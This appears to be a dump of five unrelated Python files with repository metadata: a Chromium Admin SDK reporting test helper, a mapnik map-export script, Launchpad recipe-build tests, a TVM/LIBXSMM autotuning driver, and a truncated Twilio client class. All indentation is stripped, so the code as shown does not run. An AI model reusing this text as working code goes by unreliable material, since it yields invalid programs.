# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from googleapiclient.discovery import build
from google.oauth2 import service_account
class RealTimeReportingServer():
SCOPES = ['https://www.googleapis.com/auth/admin.reports.audit.readonly']
USER_EMAIL = 'admin@beyondcorp.bigr.name'
def create_reports_service(self, user_email):
"""Build and returns an Admin SDK Reports service object authorized with
the service accounts that act on behalf of the given user.
Args:
user_email: The email of the user. Needs permissions to access
the Admin APIs.
Returns:
Admin SDK reports service object.
"""
localDir = os.path.dirname(os.path.abspath(__file__))
filePath = os.path.join(localDir, 'service_accountkey.json')
credentials = service_account.Credentials.from_service_account_file(
filePath, scopes=self.SCOPES)
delegatedCreds = credentials.create_delegated(user_email)
return build('admin', 'reports_v1', credentials=delegatedCreds)
def lookupevents(self, eventName, startTime, deviceId):
containsEvent = False
reportService = self.create_reports_service(self.USER_EMAIL)
results = reportService.activities().list(
userKey='all',
applicationName='chrome',
customerId='C029rpj4z',
eventName=eventName,
startTime=startTime).execute()
activities = results.get('items', [])
for activity in activities:
for event in activity.get('events', []):
for parameter in event.get('parameters', []):
if parameter['name'] == 'DEVICE_ID' and \
parameter['value'] in deviceId:
containsEvent = True
break
return containsEvent
|
chromium/chromium
|
chrome/test/enterprise/e2e/connector/realtime_reporting_bce/reporting_server.py
|
Python
|
bsd-3-clause
| 1,846
| 0.003792
|
import logging
import mapnik
import xml.etree.ElementTree as ET
import os
import subprocess
import tempfile
# Set up logging
logging.basicConfig(format="%(asctime)s|%(levelname)s|%(message)s", level=logging.INFO)
# Parameters
shpPath = "C:/Projects/BirthsAndPregnanciesMapping/data/2014-04-24/Zanzibar/Zanzibar.shp"
epsDir = "C:/Projects/BirthsAndPregnanciesMapping/results/eps"
max_img_size = 1000 # Max width or height of output image
# Create style
stroke = mapnik.Stroke()
stroke.color = mapnik.Color(0,0,0)
stroke.width = 1.0
symbolizer = mapnik.LineSymbolizer(stroke)
rule = mapnik.Rule()
rule.symbols.append(symbolizer)
style = mapnik.Style()
style.rules.append(rule)
# Create Datasource
datasource = mapnik.Shapefile(file=shpPath)
# Create layer
layer = mapnik.Layer("boundaries")
layer.datasource = datasource
layer.styles.append("boundariesStyle")
# Calculate image output size
envelope = datasource.envelope()
dLong = envelope.maxx - envelope.minx
dLat = envelope.maxy - envelope.miny
aspectRatio = dLong / dLat
if dLong > dLat:
width = max_img_size
height = int(width / aspectRatio)
elif dLat > dLong:
height = max_img_size
width = int(aspectRatio * height)
else:
width = max_img_size
height = max_img_size
# Create map
map = mapnik.Map(width, height)
map.append_style("boundariesStyle", style)
map.layers.append(layer)
map.zoom_all()
# Output to temporary postscript file
outPsPath = os.path.join(tempfile.gettempdir(), "ZanzibarAdminBoundaries.ps")
mapnik.render_to_file(map, outPsPath)
# Convert postscript to EPS file using ghostscript
outEpsPath = os.path.join(epsDir, "ZanzibarAdminBoundaries.eps")
subprocess.call(["C:/Program Files/gs/gs9.14/bin/gswin64c",
"-dDEVICEWIDTHPOINTS=%s" % width,
"-dDEVICEHEIGHTPOINTS=%s" % height,
"-sDEVICE=eps2write",
"-o",
outEpsPath,
outPsPath])
# Delete temporary file
os.remove(outPsPath)
|
hishivshah/WorldPop
|
code/create_zanzibar_boundary_map.py
|
Python
|
mit
| 1,981
| 0.002524
|
# Copyright 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Tests for the source package recipe view classes and templates."""
__metaclass__ = type
from mechanize import LinkNotFoundError
from storm.locals import Store
from testtools.matchers import StartsWith
import transaction
from zope.component import getUtility
from zope.security.interfaces import Unauthorized
from zope.security.proxy import removeSecurityProxy
from lp.buildmaster.enums import BuildStatus
from lp.registry.interfaces.person import IPersonSet
from lp.services.webapp import canonical_url
from lp.soyuz.interfaces.processor import IProcessorSet
from lp.testing import (
admin_logged_in,
ANONYMOUS,
BrowserTestCase,
login,
logout,
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
from lp.testing.pages import (
extract_text,
find_main_content,
find_tags_by_class,
setupBrowser,
setupBrowserForUser,
)
from lp.testing.sampledata import ADMIN_EMAIL
class TestCanonicalUrlForRecipeBuild(TestCaseWithFactory):
layer = DatabaseFunctionalLayer
def test_canonical_url(self):
owner = self.factory.makePerson(name='ppa-owner')
ppa = self.factory.makeArchive(owner=owner, name='ppa')
build = self.factory.makeSourcePackageRecipeBuild(archive=ppa)
self.assertThat(
canonical_url(build),
StartsWith(
'http://launchpad.dev/~ppa-owner/+archive/ppa/+recipebuild/'))
class TestSourcePackageRecipeBuild(BrowserTestCase):
"""Create some sample data for recipe tests."""
layer = DatabaseFunctionalLayer
def setUp(self):
"""Provide useful defaults."""
super(TestSourcePackageRecipeBuild, self).setUp()
self.admin = getUtility(IPersonSet).getByEmail(ADMIN_EMAIL)
self.chef = self.factory.makePerson(
displayname='Master Chef', name='chef')
self.user = self.chef
self.ppa = self.factory.makeArchive(
displayname='Secret PPA', owner=self.chef, name='ppa')
self.squirrel = self.factory.makeDistroSeries(
displayname='Secret Squirrel', name='secret', version='100.04',
distribution=self.ppa.distribution)
naked_squirrel = removeSecurityProxy(self.squirrel)
naked_squirrel.nominatedarchindep = self.squirrel.newArch(
'i386', getUtility(IProcessorSet).getByName('386'), False,
self.chef, supports_virtualized=True)
def makeRecipeBuild(self):
"""Create and return a specific recipe."""
chocolate = self.factory.makeProduct(name='chocolate')
cake_branch = self.factory.makeProductBranch(
owner=self.chef, name='cake', product=chocolate)
recipe = self.factory.makeSourcePackageRecipe(
owner=self.chef, distroseries=self.squirrel, name=u'cake_recipe',
description=u'This recipe builds a foo for disto bar, with my'
' Secret Squirrel changes.', branches=[cake_branch],
daily_build_archive=self.ppa)
build = self.factory.makeSourcePackageRecipeBuild(
recipe=recipe)
return build
def test_cancel_build(self):
"""An admin can cancel a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Cancel build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Cancel build').click()
self.assertEqual(
browser.url,
build_url)
login(ANONYMOUS)
self.assertEqual(
BuildStatus.SUPERSEDED,
build.status)
def test_cancel_build_not_admin(self):
"""No one but an admin can cancel a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.chef)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Cancel build')
self.assertRaises(
Unauthorized,
self.getUserBrowser, build_url + '/+cancel', user=self.chef)
def test_cancel_build_wrong_state(self):
"""If the build isn't queued, you can't cancel it."""
build = self.makeRecipeBuild()
build.cancelBuild()
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Cancel build')
def test_rescore_build(self):
"""An admin can rescore a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Rescore build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Score').value = '1024'
browser.getControl('Rescore build').click()
self.assertEqual(
browser.url,
build_url)
login(ANONYMOUS)
self.assertEqual(
build.buildqueue_record.lastscore,
1024)
def test_rescore_build_invalid_score(self):
"""Build scores can only take numbers."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Rescore build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Score').value = 'tentwentyfour'
browser.getControl('Rescore build').click()
self.assertEqual(
extract_text(find_tags_by_class(browser.contents, 'message')[1]),
'Invalid integer data')
def test_rescore_build_not_admin(self):
"""No one but admin can rescore a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.chef)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Rescore build')
self.assertRaises(
Unauthorized,
self.getUserBrowser, build_url + '/+rescore', user=self.chef)
def test_rescore_build_wrong_state(self):
"""If the build isn't queued, you can't rescore it."""
build = self.makeRecipeBuild()
build.cancelBuild()
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Rescore build')
def test_rescore_build_wrong_state_stale_link(self):
"""Show sane error if you attempt to rescore a non-queued build.
This is the case where the user has a stale link that they click on.
"""
build = self.factory.makeSourcePackageRecipeBuild()
build.cancelBuild()
index_url = canonical_url(build)
browser = self.getViewBrowser(build, '+rescore', user=self.admin)
self.assertEqual(index_url, browser.url)
self.assertIn(
'Cannot rescore this build because it is not queued.',
browser.contents)
def test_rescore_build_wrong_state_stale_page(self):
"""Show sane error if you attempt to rescore a non-queued build.
This is the case where the user is on the rescore page and submits.
"""
build = self.factory.makeSourcePackageRecipeBuild()
index_url = canonical_url(build)
browser = self.getViewBrowser(build, '+rescore', user=self.admin)
with person_logged_in(self.admin):
build.cancelBuild()
browser.getLink('Rescore build').click()
self.assertEqual(index_url, browser.url)
self.assertIn(
'Cannot rescore this build because it is not queued.',
browser.contents)
def test_builder_history(self):
build = self.makeRecipeBuild()
Store.of(build).flush()
build_url = canonical_url(build)
build.updateStatus(
BuildStatus.FULLYBUILT, builder=self.factory.makeBuilder())
browser = self.getViewBrowser(build.builder, '+history')
self.assertTextMatchesExpressionIgnoreWhitespace(
'Build history.*~chef/chocolate/cake recipe build',
extract_text(find_main_content(browser.contents)))
self.assertEqual(build_url,
browser.getLink('~chef/chocolate/cake recipe build').url)
def makeBuildingRecipe(self, archive=None):
builder = self.factory.makeBuilder()
build = self.factory.makeSourcePackageRecipeBuild(archive=archive)
build.updateStatus(BuildStatus.BUILDING, builder=builder)
build.queueBuild()
build.buildqueue_record.builder = builder
build.buildqueue_record.logtail = 'i am failing'
return build
def makeNonRedirectingBrowser(self, url, user=None):
browser = setupBrowserForUser(user) if user else setupBrowser()
browser.mech_browser.set_handle_equiv(False)
browser.open(url)
return browser
def test_builder_index_public(self):
build = self.makeBuildingRecipe()
url = canonical_url(build.builder)
logout()
browser = self.makeNonRedirectingBrowser(url)
self.assertIn('i am failing', browser.contents)
def test_builder_index_private(self):
archive = self.factory.makeArchive(private=True)
with admin_logged_in():
build = self.makeBuildingRecipe(archive=archive)
url = canonical_url(removeSecurityProxy(build).builder)
random_person = self.factory.makePerson()
logout()
# An unrelated user can't see the logtail of a private build.
browser = self.makeNonRedirectingBrowser(url, random_person)
self.assertNotIn('i am failing', browser.contents)
# But someone who can see the archive can.
browser = self.makeNonRedirectingBrowser(url, archive.owner)
self.assertIn('i am failing', browser.contents)
|
abramhindle/UnnaturalCodeFork
|
python/testdata/launchpad/lib/lp/code/browser/tests/test_sourcepackagerecipebuild.py
|
Python
|
agpl-3.0
| 11,028
| 0.000091
|
#!/usr/bin/env python3
###############################################################################
# Copyright (c) Intel Corporation - All rights reserved. #
# This file is part of the LIBXSMM library. #
# #
# For information on the license, see the LICENSE file. #
# Further information: https://github.com/hfp/libxsmm/ #
# SPDX-License-Identifier: BSD-3-Clause #
###############################################################################
# Anand Venkat (Intel Corp.)
###############################################################################
import logging
import sys
import numpy as np
import tvm
import topi
import time
from topi.util import get_const_tuple
import math
import topi.testing
import xlwt
import argparse
import os
import ctypes
from tvm import autotvm
from tvm.autotvm.tuner import XGBTuner, GATuner, RandomTuner, GridSearchTuner
parser = argparse.ArgumentParser()
parser.add_argument("-d", nargs=1, type=str, default=["resnet3"])
args = parser.parse_args()
layer = args.d[0]
#Resnet-50 layers (excluding first layer)
_resnet_layers ={
'resnet2':[1,256,64,56,56,1,1,0],
'resnet3':[1,64,64,56,56,1,1,0],
'resnet4':[1,64,64,56,56,3,1,1],
'resnet5':[1,64,256,56,56,1,1,0],
'resnet6':[1,512,256,56,56,1,2,0],
'resnet7':[1,128,256,56,56,1,2,0],
'resnet8':[1,128,128,28,28,3,1,1],
'resnet9':[1,512,128,28,28,1,1,0],
'resnet10':[1,128,512,28,28,1,1,0],
'resnet11':[1,1024,512,28,28,1,2,0],
'resnet12':[1,256,512,28,28,1,2,0],
'resnet13':[1,256,256,14,14,3,1,1],
'resnet14':[1,1024,256,14,14,1,1,0],
'resnet15':[1,256,1024,14,14,1,1,0],
'resnet16':[1,2048,1024,14,14,1,2,0],
'resnet17':[1,512,1024,14,14,1,2,0],
'resnet18':[1,512,512,7,7,3,1,1],
'resnet19':[1,2048,512,7,7,1,1,0],
'resnet20':[1,512,2048,7,7,1,1,0]
}
'''
Convert input from NCHW format to NCHW16C format where the innermost data dimension is vectorized for AVX-512
'''
def convert_input(a_np, batch, in_channel,input_height,input_width,pad_height,pad_width,vlen,A):
to_return = np.zeros((batch, math.ceil(in_channel/vlen),input_height + 2*pad_height, input_width+ 2*pad_width,vlen),dtype = A.dtype)
for i in range(batch):
for j in range(math.ceil(in_channel/vlen)):
for k in range(input_height + 2*pad_height):
for l in range(input_width + 2*pad_width):
for m in range(vlen):
if k < pad_height or k >= input_height + pad_height or l < pad_width or l >= input_width+ pad_width or j*vlen + m >= in_channel:
to_return[i,j,k,l,m] = float(0)
else:
to_return[i,j,k,l,m] = a_np[i,j*vlen + m,k-pad_height,l-pad_width]
return to_return
'''
Convert output from NCHW format to NCHW16C format where the innermost data dimension is vectorized for AVX-512
'''
def convert_output(a_np, batch, out_channel,output_height,output_width,vlen):
to_return = np.zeros((batch, out_channel,output_height, output_width), dtype = float)
for i in range(batch):
for j in range(math.ceil(out_channel/vlen)):
for k in range(output_height):
for l in range(output_width):
for m in range(vlen):
to_return[i,j*vlen + m,k,l] = a_np[i,j,k,l,m]
return to_return
'''
Convert weights from KCRS format to KCRS16C16K format where the innermost data dimension is vectorized for AVX-512
'''
def convert_weight(w_np, in_channel, out_channel, kernel_height, kernel_width, vlen,W):
to_return = np.zeros((math.ceil(out_channel/vlen), math.ceil(in_channel/vlen),kernel_height, kernel_width,vlen,vlen), dtype = W.dtype)
for i in range(math.ceil(out_channel/vlen)):
for j in range(math.ceil(in_channel/vlen)):
for k in range(kernel_height):
for l in range(kernel_width):
for m in range(vlen):
for n in range(vlen):
if i*vlen + n >= out_channel or j*vlen + m >= in_channel:
to_return[i,j,k,l,m,n] =float(0)
else:
to_return[i,j,k,l,m,n] = w_np[i*vlen + n,j*vlen+ m,k,l]
return to_return
# Get the reference output tensor for correctness check
def get_ref_data(batch,out_channel,in_channel,input_height,input_width,kernel_height,kernel_width,stride_height,padding):
a_np = np.random.uniform(size=(batch,in_channel,input_height,input_width)).astype(float)
w_np = np.random.uniform(size=(out_channel,in_channel,kernel_height,kernel_width)).astype(float)
if batch == 1:
b_np = topi.testing.conv2d_nchw_python(a_np, w_np, stride_height, padding)
#b_np = topi.nn.conv2d_NCHWc(a_np, w_np,out_channel,kernel_height,stride_height,
# padding, layout="NCHWc", out_layout="NCHWc", out_dtype='float32')
if batch == 1:
return a_np, w_np, b_np
else:
return a_np, w_np
#special case for small height and width (e.g.. h = w = 7), where (h*w) becomes dimension of the brgemm (M)
def intrin_libxsmm_hxw(ofmblock,ofw,ifmblock, stride_width,ifw,rco, ifh,r,s, ifh_stride, ifw_stride,\
ofh, stride_height, out_channel,output_height, output_width, in_channel):
last_input_width_index = (ofw-1)*stride_width + s-1
last_input_height_index = (ofh-1)*stride_height + r-1
ry = tvm.reduce_axis((0, r), name='ry')
rx = tvm.reduce_axis((0, s), name='rx')
A = tvm.placeholder((rco,r,s,ifmblock, ofmblock), name='w')
B = tvm.placeholder((rco,last_input_height_index + 1,last_input_width_index + 1,ifmblock), name='b')
k = tvm.reduce_axis((0, ifmblock), name='k')
k_outer = tvm.reduce_axis((0, rco), name='k_outer')
C = tvm.compute(
(ofh,ofw,ofmblock),
lambda z,m,n: tvm.sum(A[k_outer,ry,rx,k,n] * B[k_outer,ry + z*stride_height,rx + m*stride_width,k], axis=[k_outer,ry,rx,k]),
name='out')
s1 = tvm.create_schedule(C.op)
ifw1,ofw1,ofmblock1 = s1[C].op.axis
rco_outer,ry,rx,rci = s1[C].op.reduce_axis
s1[C].reorder(ifw1,rco_outer,ry,rx,ofw1,ofmblock1,rci)
xx_ptr = tvm.decl_buffer(A.shape, A.dtype,
name="W",offset_factor = 1,
data_alignment=64)
yy_ptr = tvm.decl_buffer(B.shape, B.dtype,
name="X",offset_factor=1,\
strides=[tvm.var("s3"),tvm.var("s2"), ifmblock, 1],#offset_factor=16
data_alignment=64)
zz_ptr = tvm.decl_buffer(C.shape, C.dtype,
name="OUT",offset_factor=1,#offset_factor=1,
strides=[output_width*ofmblock, ofmblock, 1],
data_alignment=64)
def intrin_func(ins, outs):
# tvm call extern is used to interface to libxsmm bacth reduce kernel gemm implementation
# rco*r*s is the number of batches
init_and_compute = tvm.call_extern ("int32","batch_reduce_kernel_init_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"),\
rco*r*s,ofmblock,ifmblock,r,s,ifh_stride,ifw_stride, ofw*ofh, stride_width)
reset = tvm.call_extern ("int32","batch_reduce_kernel_init", outs[0].access_ptr("w"),ofmblock, ofw*ofh)
body = tvm.call_extern ("int32","batch_reduce_kernel_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"), rco*r*s,ofmblock,\
ifmblock,ofw*ofh, stride_width,r,s, ifh_stride,ifw_stride)
if math.ceil(in_channel/ifmblock) == rco:
return init_and_compute, None, init_and_compute
else:
return init_and_compute,reset,body
with tvm.build_config(data_alignment=64):
return tvm.decl_tensor_intrin(C.op, intrin_func, name="GEMM",
binds= {A: xx_ptr,
B: yy_ptr,
C: zz_ptr})
# regular case of batch reduce gemm with ofw corresponding to batch reduce brgemm dimension(M)
def intrin_libxsmm_tuned(ofmblock,ofw,ifmblock, stride_width,ifw,rco, ifh,r,s, ifh_stride, ifw_stride, in_channel):
last_input_width_index = (ofw-1)*stride_width + s-1
A = tvm.placeholder((rco,r,s,ifmblock, ofmblock), name='w')
B = tvm.placeholder((rco,r,last_input_width_index + 1,ifmblock), name='b')
k = tvm.reduce_axis((0, ifmblock), name='k')
k_outer = tvm.reduce_axis((0, rco), name='k_outer')
ry = tvm.reduce_axis((0, r), name='ry')
rx = tvm.reduce_axis((0, s), name='rx')
C = tvm.compute(
(ofw,ofmblock),
lambda m,n: tvm.sum(A[k_outer,ry,rx,k,n] * B[k_outer,ry, rx + m*stride_width,k], axis=[k_outer,ry,rx,k]),
name='out')
s1 = tvm.create_schedule(C.op)
w,ofm = s1[C].op.axis
kco,ky,kx,kci = s1[C].op.reduce_axis
s1[C].reorder(kco,ky,kx,w,ofm,kci)
xx_ptr = tvm.decl_buffer(A.shape, A.dtype,
name="W",offset_factor=1,
data_alignment=64)
yy_ptr = tvm.decl_buffer(B.shape, B.dtype,
name="some", offset_factor=1,strides=[tvm.var("s3"), tvm.var("s2"), ifmblock, 1],
data_alignment=64)
zz_ptr = tvm.decl_buffer(C.shape, C.dtype,
name="OUT",offset_factor=1,
data_alignment=64)
def intrin_func(ins, outs):
# tvm call extern is used to interface to libxsmm batch reduce kernel gemm implementation
# rco*r*s is the number of batches
init_and_compute = tvm.call_extern ("int32","batch_reduce_kernel_init_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"),\
rco*r*s,ofmblock,ifmblock,r,s,ifh_stride,ifw_stride, ofw, stride_width)
reset = tvm.call_extern ("int32","batch_reduce_kernel_init", outs[0].access_ptr("w"),ofmblock, ofw)
body = tvm.call_extern ("int32","batch_reduce_kernel_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"), rco*r*s,ofmblock,\
ifmblock,ofw, stride_width,r,s, ifh_stride,ifw_stride)
if math.ceil(in_channel/ifmblock) == rco:
return init_and_compute, None, init_and_compute
else:
return init_and_compute,reset,body
with tvm.build_config(data_alignment=64):
return tvm.decl_tensor_intrin(C.op, intrin_func, name="GEMM",
binds={A: xx_ptr,
B: yy_ptr,
C: zz_ptr})
#AutoTVM template for libxmm brgemm based tensorize implementation
@autotvm.template
def conv_auto_tuned(ofmblock,ofw, ifmblock, stride_width,input_width,\
in_channel,input_height, filter_height, filter_width,ofh, stride_height, batch, out_channel):
A1 = tvm.placeholder((batch,math.ceil(in_channel/ifmblock),input_height, input_width, ifmblock), name='input')
W1 = tvm.placeholder((math.ceil(out_channel/ofmblock), math.ceil(in_channel/ifmblock), filter_height, filter_width, ifmblock,ofmblock), name='weight')
rco1 = tvm.reduce_axis((0, math.ceil(in_channel/ifmblock)), name='rco1')
ry1 = tvm.reduce_axis((0, filter_height), name='ry1')
rx1 = tvm.reduce_axis((0, filter_width), name='rx1')
rci1 = tvm.reduce_axis((0, ifmblock), name='rci1')
cfg = autotvm.get_config()
cfg.define_knob("pack", [0,1])
pack = False
w_tile = []
factor_found = False
for i in range(6, min(ofw+1,29)):
if ofw % i == 0:
w_tile.append((i, ofw//i) )
factor_found = True
if factor_found == False:
w_tile.append((ofw,1))
#tile factors for output width
cfg.define_knob("tile_w", w_tile)
# pack data when stride > 1 and pack flag set so that data for brgemm is continuous
if filter_height == 1 and filter_width == 1 and stride_width > 1 and stride_height > 1 and cfg['pack'].val == 1 :
A2 = tvm.compute((batch, math.ceil(in_channel/ifmblock),ofh,ofw,ifmblock),
lambda n,c,h,w,vlen1: A1[n, c,h*stride_height,w*stride_width,vlen1])
B1 = tvm.compute((batch, math.ceil(out_channel/ofmblock),ofh, ofw,ofmblock),
lambda nn,ff,yy, xx, vlen1: tvm.sum(
W1[ff,rco1,ry1,rx1,rci1,vlen1] * A2[nn, rco1, ry1 + yy, rx1 + xx,rci1],
axis=[rco1,ry1, rx1, rci1]),name='output')
pack = True
else:
# Compute the convolution
B1 = tvm.compute((batch, math.ceil(out_channel/ofmblock),ofh, ofw,ofmblock),
lambda nn,ff,yy, xx, vlen1: tvm.sum(
W1[ff,rco1,ry1,rx1,rci1,vlen1] * A1[nn, rco1, ry1 + stride_height*yy, rx1 + stride_width*xx,rci1],
axis=[rco1,ry1, rx1, rci1]), name='output')
s = tvm.create_schedule(B1.op)
n,ko,h,w,ki = s[B1].op.axis
rco,ry,rx, rci = s[B1].op.reduce_axis
cfg.define_split("tile_h", h, num_outputs=3)#output height
cfg.define_split("tile_c", rco, num_outputs=2) #input channel dimension
cfg.define_split("tile_k",ko, num_outputs=2) #output channel dimension
w_factor_inner, _ = cfg["tile_w"].val
wo, wi = s[B1].split(w, w_factor_inner) #tiling
rco_o,rco_i = cfg["tile_c"].apply(s, B1, rco)
ko_o, ko_i = cfg["tile_k"].apply(s, B1, ko)
ho,hm, hi = cfg["tile_h"].apply(s, B1, h)
s[B1].reorder(n,ko_o,ho,ko_i,rco_o,hm,wo,hi,rco_i,ry,rx,wi,ki,rci)
cfg.define_reorder("reorder_outer", [ko_i,rco_o,hm,wo], policy="all")
cfg.add_flop(np.prod(get_const_tuple(B1.shape))*in_channel*filter_height*filter_width*2)
cfg["reorder_outer"].apply(s, B1,[ko_i,rco_o,hm,wo])
if (filter_height == 1 and filter_width == 1 and stride_width == 1 and stride_height == 1) or pack:
if cfg["tile_h"].size[1] > 1 and w_factor_inner == ofw:#cfg["tile_w"].size[2] == ofw:
libxsmm_tensorize = intrin_libxsmm_hxw(ofmblock,w_factor_inner,ifmblock, 1, w_factor_inner,
cfg["tile_c"].size[1],cfg["tile_h"].size[2],\
filter_height, filter_width,ofh,ofw,cfg["tile_h"].size[2],1, out_channel, ofh,ofw, in_channel)
s[B1].tensorize(hi, libxsmm_tensorize)
else:
libxsmm_tensorize = intrin_libxsmm_tuned(ofmblock,w_factor_inner,ifmblock, 1, w_factor_inner,
cfg["tile_c"].size[1], cfg["tile_h"].size[2],\
filter_height, filter_width,ofh, ofw, in_channel)
s[B1].tensorize(rco_i, libxsmm_tensorize)
else:
libxsmm_tensorize = intrin_libxsmm_tuned(ofmblock,w_factor_inner,ifmblock, stride_width, w_factor_inner,\
cfg["tile_c"].size[1], cfg["tile_h"].size[2],\
filter_height, filter_width,input_height,input_width, in_channel)
s[B1].tensorize(rco_i, libxsmm_tensorize)
par = s[B1].fuse(n,ko_o,ho)
s[B1].parallel(par)
if pack:
n1,c1,h1,w1,v1 = s[A2].op.axis
par2 = s[A2].fuse(n1,c1,h1)
s[A2].parallel(par)
s[A2].vectorize(v1)
s = s.normalize()
return s, [W1, A1, B1]
def driver():
book = xlwt.Workbook(encoding="utf-8")
sheet1 = book.add_sheet("Sheet 1")
row1=0
sheet1.write(0,0,"Layer")
sheet1.write(0,1,"AutoTVM_FLOPS")
row1 = row1 + 1
batch = _resnet_layers[layer][0]
in_channel = _resnet_layers[layer][2]
out_channel = _resnet_layers[layer][1]
input_height = _resnet_layers[layer][3]
input_width = _resnet_layers[layer][4]
kernel_height = _resnet_layers[layer][5]
kernel_width = _resnet_layers[layer][5]
pad_height = _resnet_layers[layer][7]
pad_width = _resnet_layers[layer][7]
stride_height = _resnet_layers[layer][6]
stride_width = _resnet_layers[layer][6]
vlen = 64
assert(pad_height == pad_width)
assert(stride_height == stride_width)
assert(kernel_height == kernel_width)
output_width = ((input_width + 2 * pad_width - kernel_width) // stride_width) + 1
output_height = ((input_height + 2 * pad_height - kernel_height) // stride_height) + 1
assert(output_height == output_width)
assert(input_height == input_width)
ctx = tvm.context('llvm', 0)
sheet1.write(row1,0,layer)
if not ctx.exist:
print("Skip because %s is not enabled" % device)
return
task = autotvm.task.create(conv_auto_tuned, args=(vlen,output_width, vlen, stride_width,input_width + 2*pad_width, in_channel,\
input_height + 2*pad_height, kernel_height, kernel_width,output_height, stride_height, batch, out_channel),\
target='llvm -mtriple=x86_64 -mcpu=skylake-avx512 -mattr=+skx,+fma,+fma4,+avx512ifma,+avx512f,+avx512cd,+avx512bw,+avx512vl,+avx512dq')
logging.getLogger('autotvm').setLevel(logging.DEBUG)
logging.getLogger('autotvm').addHandler(logging.StreamHandler(sys.stdout))
measure_option = autotvm.measure_option(builder=autotvm.LocalBuilder(), runner=autotvm.LocalRunner(number=1000, repeat=1,min_repeat_ms=1000))
tuner = autotvm.tuner.RandomTuner(task)
#Please limit n_trial to reduce tuning time
n_trial= len(task.config_space)
log_file = layer + ".log"
#comment out the following call to tuner to just run the best case from log file history
tuner.tune(n_trial=n_trial,
measure_option=measure_option,
callbacks=[
autotvm.callback.progress_bar(n_trial, prefix=layer),
autotvm.callback.log_to_file(log_file)])
with autotvm.apply_history_best( layer+'.log'):
with tvm.target.create("llvm"):
a_np, w_np, b_np = get_ref_data(batch,out_channel,in_channel,input_height,input_width,kernel_height, kernel_width,stride_height,pad_height)
s, arg_bufs = conv_auto_tuned(vlen,output_width, vlen, stride_width,input_width + 2*pad_width, in_channel,\
input_height + 2*pad_height, kernel_height, kernel_width,output_height, stride_height, batch, out_channel)
a_np2 = convert_input(a_np, batch, in_channel,input_height,input_width,pad_height,pad_width,vlen, arg_bufs[1])
w_np2 = convert_weight(w_np, in_channel, out_channel, kernel_height, kernel_width,vlen,arg_bufs[0])
ctx = tvm.context('llvm', 0)
b = tvm.nd.array(np.zeros((batch, math.ceil(out_channel/vlen),output_height, output_width,vlen), dtype=arg_bufs[2].dtype), ctx)
a = tvm.nd.array(a_np2, ctx)
w = tvm.nd.array(w_np2, ctx)
func = tvm.build(s, arg_bufs,target=\
'llvm -mtriple=x86_64 -mcpu=skylake-avx512 -mattr=+skx,+fma,+fma4,+avx512ifma,+avx512f,+avx512cd,+avx512bw,+avx512vl,+avx512dq', name="conv2d")
func(w,a,b)
b_np_A = convert_output(b.asnumpy(), 1,out_channel, output_height, output_width,vlen)
np.testing.assert_allclose(b_np_A, b_np, rtol=1e-5)
evaluator1 = func.time_evaluator(func.entry_name, ctx, number=1000,repeat=1, min_repeat_ms=1)
t1 = evaluator1(w,a, b).mean
gflops_tvm1 = np.prod(get_const_tuple(arg_bufs[2].shape))*in_channel*kernel_height*kernel_width*2
gflops_tvm1 = gflops_tvm1/1e9/t1
print("Time for conv(tuned) is : {0:.6f}".format(t1))
print("GFLOPS : {0:.3f} ".format( gflops_tvm1))
sheet1.write(row1,1,gflops_tvm1)
row1 = row1 + 1
book.save( "AutoTVM_tensorize_resnet" + layer +".xls")
if __name__ == "__main__":
driver()
|
hfp/libxsmm
|
samples/deeplearning/tvm_cnnlayer/mb1_tuned_latest.py
|
Python
|
bsd-3-clause
| 20,227
| 0.039996
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class SubscribedTrackList(ListResource):
""" """
def __init__(self, version, room_sid, participant_sid):
"""
Initialize the SubscribedTrackList
:param Version version: Version that contains the resource
:param room_sid: The SID of the room where the track is published
:param participant_sid: The SID of the participant that subscribes to the track
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackList
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackList
"""
super(SubscribedTrackList, self).__init__(version)
# Path Solution
self._solution = {'room_sid': room_sid, 'participant_sid': participant_sid, }
